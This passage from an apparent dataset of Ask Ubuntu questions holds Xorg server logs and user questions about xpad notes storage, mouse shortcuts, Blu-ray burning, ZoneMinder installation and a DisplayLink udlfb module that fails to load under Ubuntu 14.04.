] ( ii ) intel ( 0 ) : direct rendering : dri2 enabled [ 5.818 ] ( == ) intel ( 0 ) : hotplug detection : `` enabled '' [ 5.819 ] ( -- ) randr disabled [ 5.823 ] ( ii ) selinux : disabled on system [ 5.854 ] ( ii ) aiglx : enabled glx_mesa_copy_sub_buffer [ 5.854 ] ( ii ) aiglx : enabled glx_arb_create_context [ 5.854 ] ( ii ) aiglx : enabled glx_arb_create_context_profile [ 5.854 ] ( ii ) aiglx : enabled glx_ext_create_context_es2_profile [ 5.854 ] ( ii ) aiglx : enabled glx_intel_swap_event [ 5.854 ] ( ii ) aiglx : enabled glx_sgi_swap_control and glx_mesa_swap_control [ 5.854 ] ( ii ) aiglx : enabled glx_ext_framebuffer_srgb [ 5.854 ] ( ii ) aiglx : enabled glx_arb_fbconfig_float [ 5.854 ] ( ii ) aiglx : glx_ext_texture_from_pixmap backed by buffer objects [ 5.854 ] ( ii ) aiglx : enabled glx_arb_create_context_robustness [ 5.854 ] ( ii ) aiglx : loaded and initialized i965 [ 5.854 ] ( ii ) glx : initialized dri2 gl provider for screen 0 [ 5.858 ] ( ii ) intel ( 0 ) : switch to mode 1920x1080 @ 60.0 on lvds1 using pipe 0 , position ( 0 , 0 ) , rotation normal , reflection none [ 5.868 ] ( ii ) intel ( 0 ) : setting screen physical size to 508 x 285 [ 5.877 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 5.880 ] ( ii ) config/udev : adding input device power button ( /dev/input/event2 ) [ 5.880 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 5.880 ] ( ii ) loadmodule : `` evdev '' [ 5.880 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 5.881 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 5.881 ] compiled for 1.15.0 , module version = 2.8.2 [ 5.881 ] module class : x.org xinput driver [ 5.881 ] abi class : x.org xinput driver , version 20.0 [ 5.881 ] ( ii ) using input driver 'evdev ' for 'power button' [ 5.881 ] ( ** ) power button : always reports core events [ 5.882 ] ( ** ) evdev : power button : device : `` /dev/input/event2 '' [ 5.882 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 5.882 ] ( -- ) evdev : power button : found keys [ 5.882 ] ( ii ) evdev : power button : configuring as keyboard [ 5.882 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input2/event2 '' [ 5.882 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 6 ) [ 5.882 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 5.882 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 5.882 ] ( ** ) option `` xkb_layout '' `` de '' [ 5.884 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-808bba3d4c227bdb44c370226c34e44c5d69a4a9.xkm [ 5.885 ] ( ii ) config/udev : adding input device video bus ( /dev/input/event5 ) [ 5.885 ] ( ** ) video bus : applying inputclass `` evdev keyboard catchall '' [ 5.885 ] ( ii ) using input driver 'evdev ' for 'video bus' [ 5.885 ] ( ** ) video bus : always reports core events [ 5.885 ] ( ** ) evdev : video bus : device : `` /dev/input/event5 '' [ 5.885 ] ( -- ) evdev : video bus : vendor 0 product 0x6 [ 5.885 ] ( -- ) evdev : video bus : found keys [ 5.885 ] ( ii ) evdev : video bus : configuring as keyboard [ 5.885 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:00/input/input7/event5 '' [ 5.885 ] ( ii ) xinput : adding extended input device `` video bus '' ( type : keyboard , id 7 ) [ 5.885 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 5.885 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 5.885 ] ( ** ) option `` xkb_layout '' `` de '' [ 5.886 ] ( ii ) config/udev : adding input device video bus ( /dev/input/event6 ) [ 5.886 ] ( ** ) video bus : applying inputclass `` evdev keyboard catchall '' [ 5.886 ] ( ii ) using input driver 'evdev ' for 'video bus' [ 5.886 ] ( ** ) video bus : always reports core events [ 5.886 ] ( ** ) evdev : video bus : device : `` /dev/input/event6 '' [ 5.886 ] ( -- ) evdev : video bus : vendor 0 product 0x6 [ 5.886 ] ( -- ) evdev : video bus : found keys [ 5.886 ] ( ii ) evdev : video bus : configuring as keyboard [ 5.886 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/device:0a/lnxvideo:01/input/input8/event6 '' [ 5.886 ] ( ii ) xinput : adding extended input device `` video bus '' ( type : keyboard , id 8 ) [ 5.886 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 5.886 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 5.886 ] ( ** ) option `` xkb_layout '' `` de '' [ 5.886 ] ( ii ) config/udev : adding input device lid switch ( /dev/input/event0 ) [ 5.886 ] ( ii ) no input driver specified , ignoring this device . [ 5.886 ] ( ii ) this device may have been added with another device file . [ 5.887 ] ( ii ) config/udev : adding input device sleep button ( /dev/input/event1 ) [ 5.887 ] ( ** ) sleep button : applying inputclass `` evdev keyboard catchall '' [ 5.887 ] ( ii ) using input driver 'evdev ' for 'sleep button' [ 5.887 ] ( ** ) sleep button : always reports core events [ 5.887 ] ( ** ) evdev : sleep button : device : `` /dev/input/event1 '' [ 5.887 ] ( -- ) evdev : sleep button : vendor 0 product 0x3 [ 5.887 ] ( -- ) evdev : sleep button : found keys [ 5.887 ] ( ii ) evdev : sleep button : configuring as keyboard [ 5.887 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0e:00/input/input1/event1 '' [ 5.887 ] ( ii ) xinput : adding extended input device `` sleep button '' ( type : keyboard , id 9 ) [ 5.887 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 5.887 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 5.887 ] ( ** ) option `` xkb_layout '' `` de '' [ 5.887 ] ( ii ) config/udev : adding drm device ( /dev/dri/card0 ) [ 5.887 ] ( ii ) config/udev : ignoring already known drm device ( /dev/dri/card0 ) [ 5.888 ] ( ii ) config/udev : adding input device integrated camera ( /dev/input/event12 ) [ 5.888 ] ( ** ) integrated camera : applying inputclass `` evdev keyboard catchall '' [ 5.888 ] ( ii ) using input driver 'evdev ' for 'integrated camera' [ 5.888 ] ( ** ) integrated camera : always reports core events [ 5.888 ] ( ** ) evdev : integrated camera : device : `` /dev/input/event12 '' [ 5.888 ] ( -- ) evdev : integrated camera : vendor 0x4f2 product 0xb217 [ 5.888 ] ( -- ) evdev : integrated camera : found keys [ 5.888 ] ( ii ) evdev : integrated camera : configuring as keyboard [ 5.888 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.0/input/input14/event12 '' [ 5.888 ] ( ii ) xinput : adding extended input device `` integrated camera '' ( type : keyboard , id 10 ) [ 5.888 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 5.888 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 5.888 ] ( ** ) option `` xkb_layout '' `` de '' [ 5.888 ] ( ii ) config/udev : adding input device hda intel pch dock mic ( /dev/input/event9 ) [ 5.888 ] ( ii ) no input driver specified , ignoring this device . [ 5.888 ] ( ii ) this device may have been added with another device file . [ 5.889 ] ( ii ) config/udev : adding input device hda intel pch dock headphone ( /dev/input/event8 ) [ 5.889 ] ( ii ) no input driver specified , ignoring this device . [ 5.889 ] ( ii ) this device may have been added with another device file . [ 5.889 ] ( ii ) config/udev : adding input device hda intel pch headphone ( /dev/input/event7 ) [ 5.889 ] ( ii ) no input driver specified , ignoring this device . [ 5.889 ] ( ii ) this device may have been added with another device file . [ 5.889 ] ( ii ) config/udev : adding input device hda intel pch mic ( /dev/input/event10 ) [ 5.889 ] ( ii ) no input driver specified , ignoring this device . [ 5.889 ] ( ii ) this device may have been added with another device file . [ 5.889 ] ( ii ) config/udev : adding input device at translated set 2 keyboard ( /dev/input/event3 ) [ 5.889 ] ( ** ) at translated set 2 keyboard : applying inputclass `` evdev keyboard catchall '' [ 5.889 ] ( ii ) using input driver 'evdev ' for 'at translated set 2 keyboard' [ 5.889 ] ( ** ) at translated set 2 keyboard : always reports core events [ 5.889 ] ( ** ) evdev : at translated set 2 keyboard : device : `` /dev/input/event3 '' [ 5.889 ] ( -- ) evdev : at translated set 2 keyboard : vendor 0x1 product 0x1 [ 5.889 ] ( -- ) evdev : at translated set 2 keyboard : found keys [ 5.889 ] ( ii ) evdev : at translated set 2 keyboard : configuring as keyboard [ 5.889 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio0/input/input3/event3 '' [ 5.889 ] ( ii ) xinput : adding extended input device `` at translated set 2 keyboard '' ( type : keyboard , id 11 ) [ 5.889 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 5.889 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 5.889 ] ( ** ) option `` xkb_layout '' `` de '' [ 5.890 ] ( ii ) config/udev : adding input device synps/2 synaptics touchpad ( /dev/input/event11 ) [ 5.890 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` evdev touchpad catchall '' [ 5.890 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` touchpad catchall '' [ 5.890 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` default clickpad buttons '' [ 5.890 ] ( ii ) loadmodule : `` synaptics '' [ 5.890 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 5.892 ] ( ii ) module synaptics : vendor= '' x.org foundation '' [ 5.892 ] compiled for 1.15.0 , module version = 1.7.4 [ 5.892 ] module class : x.org xinput driver [ 5.892 ] abi class : x.org xinput driver , version 20.0 [ 5.892 ] ( ii ) using input driver 'synaptics ' for 'synps/2 synaptics touchpad' [ 5.892 ] ( ** ) synps/2 synaptics touchpad : always reports core events [ 5.892 ] ( ** ) option `` device '' `` /dev/input/event11 '' [ 5.936 ] ( ii ) synaptics : synps/2 synaptics touchpad : ignoring touch events for semi-multitouch device [ 5.936 ] ( -- ) synaptics : synps/2 synaptics touchpad : x-axis range 1472 - 5888 ( res 75 ) [ 5.936 ] ( -- ) synaptics : synps/2 synaptics touchpad : y-axis range 1408 - 4820 ( res 105 ) [ 5.936 ] ( -- ) synaptics : synps/2 synaptics touchpad : pressure range 0 - 255 [ 5.936 ] ( -- ) synaptics : synps/2 synaptics touchpad : finger width range 0 - 15 [ 5.936 ] ( -- ) synaptics : synps/2 synaptics touchpad : buttons : left right double triple [ 5.936 ] ( -- ) synaptics : synps/2 synaptics touchpad : vendor 0x2 product 0x7 [ 5.936 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 5.936 ] ( ** ) synps/2 synaptics touchpad : always reports core events [ 5.952 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio1/input/input5/event11 '' [ 5.952 ] ( ii ) xinput : adding extended input device `` synps/2 synaptics touchpad '' ( type : touchpad , id 12 ) [ 5.952 ] ( ** ) synaptics : synps/2 synaptics touchpad : ( accel ) minspeed is now constant deceleration 2.5 [ 5.952 ] ( ** ) synaptics : synps/2 synaptics touchpad : ( accel ) maxspeed is now 1.75 [ 5.952 ] ( ** ) synaptics : synps/2 synaptics touchpad : ( accel ) accelfactor is now 0.036 [ 5.952 ] ( ** ) synps/2 synaptics touchpad : ( accel ) keeping acceleration scheme 1 [ 5.952 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration profile 1 [ 5.952 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration factor : 2.000 [ 5.952 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration threshold : 4 [ 5.952 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 5.952 ] ( ii ) config/udev : adding input device synps/2 synaptics touchpad ( /dev/input/mouse0 ) [ 5.952 ] ( ** ) synps/2 synaptics touchpad : ignoring device from inputclass `` touchpad ignore duplicates '' [ 5.953 ] ( ii ) config/udev : adding input device thinkpad extra buttons ( /dev/input/event4 ) [ 5.953 ] ( ** ) thinkpad extra buttons : applying inputclass `` evdev keyboard catchall '' [ 5.953 ] ( ii ) using input driver 'evdev ' for 'thinkpad extra buttons' [ 5.953 ] ( ** ) thinkpad extra buttons : always reports core events [ 5.953 ] ( ** ) evdev : thinkpad extra buttons : device : `` /dev/input/event4 '' [ 5.953 ] ( -- ) evdev : thinkpad extra buttons : vendor 0x17aa product 0x5054 [ 5.953 ] ( -- ) evdev : thinkpad extra buttons : found keys [ 5.953 ] ( ii ) evdev : thinkpad extra buttons : configuring as keyboard [ 5.953 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/thinkpad_acpi/input/input6/event4 '' [ 5.953 ] ( ii ) xinput : adding extended input device `` thinkpad extra buttons '' ( type : keyboard , id 13 ) [ 5.953 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 5.953 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 5.953 ] ( ** ) option `` xkb_layout '' `` de '' [ 5.954 ] ( ii ) config/udev : adding input device thinkpad hdaps joystick emulation ( /dev/input/event13 ) [ 5.954 ] ( ii ) no input driver specified , ignoring this device . [ 5.954 ] ( ii ) this device may have been added with another device file . [ 5.954 ] ( ii ) config/udev : adding input device thinkpad hdaps joystick emulation ( /dev/input/js0 ) [ 5.954 ] ( ii ) no input driver specified , ignoring this device . [ 5.954 ] ( ii ) this device may have been added with another device file . [ 5.954 ] ( ii ) config/udev : adding input device thinkpad hdaps accelerometer data ( /dev/input/event14 ) [ 5.954 ] ( ** ) thinkpad hdaps accelerometer data : ignoring device from inputclass `` thinkpad hdaps accelerometer blacklist '' [ 5.954 ] ( ii ) config/udev : adding input device thinkpad hdaps accelerometer data ( /dev/input/js1 ) [ 5.954 ] ( ** ) thinkpad hdaps accelerometer data : ignoring device from inputclass `` thinkpad hdaps accelerometer blacklist '' [ 6.120 ] ( ii ) evdev : thinkpad extra buttons : close [ 6.120 ] ( ii ) unloadmodule : `` evdev '' [ 6.120 ] ( ii ) unloadmodule : `` synaptics '' [ 6.120 ] ( ii ) evdev : at translated set 2 keyboard : close [ 6.120 ] ( ii ) unloadmodule : `` evdev '' [ 6.120 ] ( ii ) evdev : integrated camera : close [ 6.120 ] ( ii ) unloadmodule : `` evdev '' [ 6.120 ] ( ii ) evdev : sleep button : close [ 6.120 ] ( ii ) unloadmodule : `` evdev '' [ 6.120 ] ( ii ) evdev : video bus : close [ 6.120 ] ( ii ) unloadmodule : `` evdev '' [ 6.120 ] ( ii ) evdev : video bus : close [ 6.120 ] ( ii ) unloadmodule : `` evdev '' [ 6.120 ] ( ii ) evdev : power button : close [ 6.120 ] ( ii ) unloadmodule : `` evdev '' [ 6.141 ] ( ee ) server terminated successfully ( 0 ) . closing log file .
458977	where is the xpad content stored on disk ?	i had installed the xpad package on ubuntu 13.10 and had taken a few notes in it . i recently upgraded to ubuntu 14.04 and have taken the backup of the entire home folder . at which location is the content of the xpad stored on the disk ? if it is somewhere in the home folder , maybe i could retrieve it . thanks .
458979	set middle mouse click to supper+s action	is there a way to assign the middle mouse click to the short cut supper+s ? i like the way mac osx handles changing between workspaces with this action and would like to emulate it on all my linux machines if possible . thanks , jimmy
458981	burn playable blu-ray	i want to convert and burn multiple videos to a blu-ray disc that contains a menu and is playable on any standalone bd player . what should i use ? i currently have ubuntu 14.04 installed .
458982	unable to install zoneminder on ubuntu 14.04	i 've tried to follow the instructions in the following two links , but to no avail : http : //www.zoneminder.com/wiki/index.php/ubuntu_12.04/13.04_desktop http : //www.zoneminder.com/wiki/index.php/ubuntu_server_12.04_64-bit_with_zoneminder_1.26.5_the_easy_way after finishing all the steps , i would restart , but then the computer hangs on the ubuntu loading screen . i can ctrl +alt + f1 and log in via terminal , but obviously i need a gui for a surveillance system , forcing me to reinstall ubuntu . even if i do n't restart , despite the fact that during the installation of zoneminder , it showed that the program has started , i do not see it when going to either localhost ( it shows the default apache page ) , or localhost/vm ( shows a 404 ) . not sure what i 'm doing wrong , but i 've got no idea what to do , or what other alternatives there are to zm that i could try . personally , i 'm looking for whatever works . if i ca n't solve this problem easily , i would prefer to simply install an alternative program . also , i recall reading something about there being php/sql issues for this release of ubuntu due to deprecated code ( i assume the switch over to pdo in php ) . that might explain things , but again , i 'm not sure .
458985	ubuntu 14.04 failed to load module udlfb	displaylink does n't load and run . the adapter is recognized and /dev/fb1 is created . usb bus info : bus 001 device 006 : id 17e9:0198 displaylink xorg.0.log : x.org x server 1.15.1 release date : 2014-04-13 [ 44708.386 ] x protocol version 11 , revision 0 [ 44708.389 ] build operating system : linux 3.2.0-37-generic i686 ubuntu [ 44708.392 ] current operating system : linux rrl 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:08:14 utc 2014 i686 [ 44708.392 ] kernel command line : boot_image=/boot/vmlinuz-3.13.0-24-generic root=uuid=6b719a77-29e0-4668-8f16-57d0d3a73a3f ro quiet splash vt.handoff=7 [ 44708.399 ] build date : 16 april 2014 01:40:08pm [ 44708.402 ] xorg-server 2:1.15.1-0ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) [ 44708.405 ] current version of pixman : 0.30.2 [ 44708.412 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 44708.412 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 44708.427 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : thu may 1 09:38:27 2014 [ 44708.431 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 44708.434 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 44708.435 ] ( == ) serverlayout `` x.org configured '' [ 44708.435 ] ( ** ) | -- > screen `` displaylinkscreen '' ( 0 ) [ 44708.435 ] ( ** ) | | -- > monitor `` displaylinkmonitor '' [ 44708.435 ] ( ** ) | | -- > device `` displaylinkdevice '' [ 44708.435 ] ( ** ) | -- > screen `` screen0 '' ( 1 ) [ 44708.435 ] ( ** ) | | -- > monitor `` monitor0 '' [ 44708.435 ] ( ** ) | | -- > device `` card0 '' [ 44708.435 ] ( ** ) | -- > input device `` mouse0 '' [ 44708.435 ] ( ** ) | -- > input device `` keyboard0 '' [ 44708.435 ] ( == ) automatically adding devices [ 44708.435 ] ( == ) automatically enabling devices [ 44708.435 ] ( == ) automatically adding gpu devices [ 44708.435 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 44708.435 ] entry deleted from font path . [ 44708.435 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 44708.435 ] entry deleted from font path . [ 44708.435 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 44708.435 ] entry deleted from font path . [ 44708.435 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 44708.435 ] entry deleted from font path . [ 44708.435 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 44708.435 ] entry deleted from font path . [ 44708.435 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 44708.435 ] entry deleted from font path . [ 44708.435 ] ( ** ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/100dpi/ : unscaled , /usr/share/fonts/x11/type1 , /usr/share/fonts/x11/100dpi , built-ins , /usr/share/fonts/x11/misc , /usr/share/fonts/x11/100dpi/ : unscaled , /usr/share/fonts/x11/type1 , /usr/share/fonts/x11/100dpi , built-ins [ 44708.435 ] ( ** ) modulepath set to `` /usr/lib/xorg/modules '' [ 44708.435 ] ( ww ) hotplugging is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . [ 44708.435 ] ( ww ) disabling mouse0 [ 44708.435 ] ( ww ) disabling keyboard0 [ 44708.435 ] ( ii ) loader magic : 0xb77106c0 [ 44708.435 ] ( ii ) module abi versions : [ 44708.435 ] x.org ansi c emulation : 0.4 [ 44708.435 ] x.org video driver : 15.0 [ 44708.435 ] x.org xinput driver : 20.0 [ 44708.435 ] x.org server extension : 8.0 [ 44708.436 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card0 ) [ 44708.436 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card1 ) [ 44708.437 ] ( -- ) pci : * ( 0:1:5:0 ) 1002:9616:105b:0e26 rev 0 , mem @ 0xf0000000/134217728 , 0xfeae0000/65536 , 0xfe900000/1048576 , i/o @ 0x0000b000/256 [ 44708.441 ] initializing built-in extension generic event extension [ 44708.444 ] initializing built-in extension shape [ 44708.448 ] initializing built-in extension mit-shm [ 44708.452 ] initializing built-in extension xinputextension [ 44708.456 ] initializing built-in extension xtest [ 44708.460 ] initializing built-in extension big-requests [ 44708.464 ] initializing built-in extension sync [ 44708.468 ] initializing built-in extension xkeyboard [ 44708.471 ] initializing built-in extension xc-misc [ 44708.475 ] initializing built-in extension security [ 44708.479 ] initializing built-in extension xinerama [ 44708.483 ] initializing built-in extension xfixes [ 44708.487 ] initializing built-in extension render [ 44708.491 ] initializing built-in extension randr [ 44708.494 ] initializing built-in extension composite [ 44708.498 ] initializing built-in extension damage [ 44708.502 ] initializing built-in extension mit-screen-saver [ 44708.506 ] initializing built-in extension double-buffer [ 44708.510 ] initializing built-in extension record [ 44708.513 ] initializing built-in extension dpms [ 44708.517 ] initializing built-in extension present [ 44708.521 ] initializing built-in extension dri3 [ 44708.525 ] initializing built-in extension x-resource [ 44708.528 ] initializing built-in extension xvideo [ 44708.532 ] initializing built-in extension xvideo-motioncompensation [ 44708.535 ] initializing built-in extension selinux [ 44708.539 ] initializing built-in extension xfree86-vidmodeextension [ 44708.542 ] initializing built-in extension xfree86-dga [ 44708.546 ] initializing built-in extension xfree86-dri [ 44708.549 ] initializing built-in extension dri2 [ 44708.549 ] ( ii ) `` glx '' will be loaded . this was enabled by default and also specified in the config file . [ 44708.549 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 44708.549 ] ( ii ) loadmodule : `` glx '' [ 44708.549 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 44708.550 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 44708.550 ] compiled for 1.15.1 , module version = 1.0.0 [ 44708.550 ] abi class : x.org server extension , version 8.0 [ 44708.550 ] ( == ) aiglx enabled [ 44708.553 ] loading extension glx [ 44708.553 ] ( ii ) loadmodule : `` udlfb '' [ 44708.554 ] ( ww ) warning , could n't open module udlfb [ 44708.554 ] ( ii ) unloadmodule : `` udlfb '' [ 44708.554 ] ( ii ) unloading udlfb [ 44708.554 ] ( ee ) failed to load module `` udlfb '' ( module does not exist , 0 ) [ 44708.554 ] ( ii ) loadmodule : `` modesetting '' [ 44708.554 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 44708.554 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 44708.554 ] compiled for 1.15.0 , module version = 0.8.1 [ 44708.554 ] module class : x.org video driver [ 44708.554 ] abi class : x.org video driver , version 15.0 [ 44708.554 ] ( == ) matched fglrx as autoconfigured driver 0 [ 44708.554 ] ( == ) matched ati as autoconfigured driver 1 [ 44708.554 ] ( == ) matched fglrx as autoconfigured driver 2 [ 44708.554 ] ( == ) matched ati as autoconfigured driver 3 [ 44708.554 ] ( == ) matched modesetting as autoconfigured driver 4 [ 44708.554 ] ( == ) matched fbdev as autoconfigured driver 5 [ 44708.554 ] ( == ) matched vesa as autoconfigured driver 6 [ 44708.554 ] ( == ) assigned the driver to the xf86configlayout [ 44708.554 ] ( ii ) loadmodule : `` fglrx '' [ 44708.554 ] ( ww ) warning , could n't open module fglrx [ 44708.554 ] ( ii ) unloadmodule : `` fglrx '' [ 44708.554 ] ( ii ) unloading fglrx [ 44708.554 ] ( ee ) failed to load module `` fglrx '' ( module does not exist , 0 ) [ 44708.554 ] ( ii ) loadmodule : `` ati '' [ 44708.554 ] ( ii ) loading /usr/lib/xorg/modules/drivers/ati_drv.so [ 44708.554 ] ( ii ) module ati : vendor= '' x.org foundation '' [ 44708.554 ] compiled for 1.15.0 , module version = 7.3.0 [ 44708.554 ] module class : x.org video driver [ 44708.554 ] abi class : x.org video driver , version 15.0 [ 44708.554 ] ( ii ) loadmodule : `` radeon '' [ 44708.555 ] ( ii ) loading /usr/lib/xorg/modules/drivers/radeon_drv.so [ 44708.555 ] ( ii ) module radeon : vendor= '' x.org foundation '' [ 44708.555 ] compiled for 1.15.0 , module version = 7.3.0 [ 44708.555 ] module class : x.org video driver [ 44708.555 ] abi class : x.org video driver , version 15.0 [ 44708.555 ] ( ii ) loadmodule : `` modesetting '' [ 44708.555 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 44708.555 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 44708.555 ] compiled for 1.15.0 , module version = 0.8.1 [ 44708.555 ] module class : x.org video driver [ 44708.555 ] abi class : x.org video driver , version 15.0 [ 44708.555 ] ( ii ) unloadmodule : `` modesetting '' [ 44708.555 ] ( ii ) unloading modesetting [ 44708.555 ] ( ii ) failed to load module `` modesetting '' ( already loaded , 0 ) [ 44708.555 ] ( ii ) loadmodule : `` fbdev '' [ 44708.555 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 44708.555 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 44708.555 ] compiled for 1.15.0 , module version = 0.4.4 [ 44708.555 ] module class : x.org video driver [ 44708.555 ] abi class : x.org video driver , version 15.0 [ 44708.555 ] ( ii ) loadmodule : `` vesa '' [ 44708.555 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 44708.555 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 44708.555 ] compiled for 1.15.0 , module version = 2.3.3 [ 44708.555 ] module class : x.org video driver [ 44708.555 ] abi class : x.org video driver , version 15.0 [ 44708.555 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 44708.555 ] ( ii ) radeon : driver for ati radeon chipsets : [ 44708.560 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 44708.560 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 44708.560 ] ( -- ) using vt number 7 [ 44708.578 ] ( ii ) modesetting ( 0 ) : using drv /dev/dri/card0 [ 44708.578 ] ( ii ) modesetting ( g0 ) : using drv /dev/dri/card1 [ 44708.578 ] ( ww ) falling back to old probe method for fbdev [ 44708.578 ] ( ii ) loading sub module `` fbdevhw '' [ 44708.578 ] ( ii ) loadmodule : `` fbdevhw '' [ 44708.578 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 44708.578 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 44708.578 ] compiled for 1.15.1 , module version = 0.0.2 [ 44708.578 ] abi class : x.org video driver , version 15.0 [ 44708.578 ] ( ww ) falling back to old probe method for vesa [ 44708.578 ] ( ** ) modesetting ( 0 ) : depth 16 , ( -- ) framebuffer bpp 16 [ 44708.578 ] ( == ) modesetting ( 0 ) : rgb weight 565 [ 44708.578 ] ( == ) modesetting ( 0 ) : default visual is truecolor [ 44708.578 ] ( ii ) modesetting ( 0 ) : shadowfb : preferred yes , enabled yes [ 44708.608 ] ( ii ) modesetting ( 0 ) : output vga-0 using monitor section displaylinkmonitor [ 44708.610 ] ( ii ) modesetting ( 0 ) : output dvi-0 has no monitor section [ 44708.640 ] ( ii ) modesetting ( 0 ) : edid for output vga-0 [ 44708.640 ] ( ii ) modesetting ( 0 ) : manufacturer : acr model : 74 serial # : 2483090993 [ 44708.640 ] ( ii ) modesetting ( 0 ) : year : 2009 week : 40 [ 44708.640 ] ( ii ) modesetting ( 0 ) : edid version : 1.3 [ 44708.640 ] ( ii ) modesetting ( 0 ) : analog display input , input voltage level : 0.700/0.700 v [ 44708.640 ] ( ii ) modesetting ( 0 ) : sync : separate [ 44708.640 ] ( ii ) modesetting ( 0 ) : max image size [ cm ] : horiz . : 53 vert . : 29 [ 44708.640 ] ( ii ) modesetting ( 0 ) : gamma : 2.20 [ 44708.640 ] ( ii ) modesetting ( 0 ) : dpms capabilities : standby suspend off ; rgb/color display [ 44708.641 ] ( ii ) modesetting ( 0 ) : first detailed timing is preferred mode [ 44708.641 ] ( ii ) modesetting ( 0 ) : redx : 0.649 redy : 0.338 greenx : 0.289 greeny : 0.609 [ 44708.641 ] ( ii ) modesetting ( 0 ) : bluex : 0.146 bluey : 0.070 whitex : 0.313 whitey : 0.329 [ 44708.641 ] ( ii ) modesetting ( 0 ) : supported established timings : [ 44708.641 ] ( ii ) modesetting ( 0 ) : 720x400 @ 70hz [ 44708.641 ] ( ii ) modesetting ( 0 ) : 640x480 @ 60hz [ 44708.641 ] ( ii ) modesetting ( 0 ) : 640x480 @ 72hz [ 44708.641 ] ( ii ) modesetting ( 0 ) : 640x480 @ 75hz [ 44708.641 ] ( ii ) modesetting ( 0 ) : 800x600 @ 56hz [ 44708.641 ] ( ii ) modesetting ( 0 ) : 800x600 @ 60hz [ 44708.641 ] ( ii ) modesetting ( 0 ) : 800x600 @ 72hz [ 44708.641 ] ( ii ) modesetting ( 0 ) : 800x600 @ 75hz [ 44708.641 ] ( ii ) modesetting ( 0 ) : 1024x768 @ 60hz [ 44708.641 ] ( ii ) modesetting ( 0 ) : 1024x768 @ 70hz [ 44708.641 ] ( ii ) modesetting ( 0 ) : 1024x768 @ 75hz [ 44708.641 ] ( ii ) modesetting ( 0 ) : 1280x1024 @ 75hz [ 44708.641 ] ( ii ) modesetting ( 0 ) : 